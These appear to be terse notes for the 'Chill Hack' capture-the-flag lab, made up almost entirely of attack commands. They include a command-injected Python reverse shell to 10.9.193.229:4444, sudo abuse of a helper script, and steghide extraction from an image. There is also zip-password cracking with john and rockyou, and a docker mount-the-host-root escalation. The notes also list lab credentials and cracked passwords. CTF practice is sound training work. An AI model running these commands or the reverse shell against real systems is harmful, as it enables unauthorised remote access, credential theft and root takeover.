Chill Hack
April 02, 2024






ls;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.193.229",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'




$msg 2>/dev/null
: This line attempts to execute the value stored in the variable msg
. It redirects any error messages (stderr) to /dev/null
, effectively discarding them. However, this line seems problematic because it's trying to execute the message as a command, which is unlikely to be the intended behavior. It would make more sense to print or log the message instead. - CHATGPT
sudo -u apaar /home/apaar/.helpline.sh
/bin/sh
/bin/sh







user = root
pass = !@m+her00+@db






Anurodh Acharya Aurick | 7e53614ced3640d5de23f111806cc4fd | masterpassword
Apaar Dahal Cullapaar | 686216240e5af30df0501e53c789a649 | dontaskdonttell

xdg-open hacker-with-laptop_23-2147985341.jpg
xdg-open 002d7e638fb463fb7a266f5ffc7ac47d.gif

steghide info hacker-with-laptop_23-2147985341.jpg

steghide extract -sf hacker-with-laptop_23-2147985341.jpg
# Just skip the password, just click enter

zip2john backup.zip > forjohn.hash

john --wordlist=/usr/share/wordlists/rockyou.txt forjohn.hash
password: pass1word




Anurodh
!d0ntKn0wmYp@ssw0rd

id

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Last updated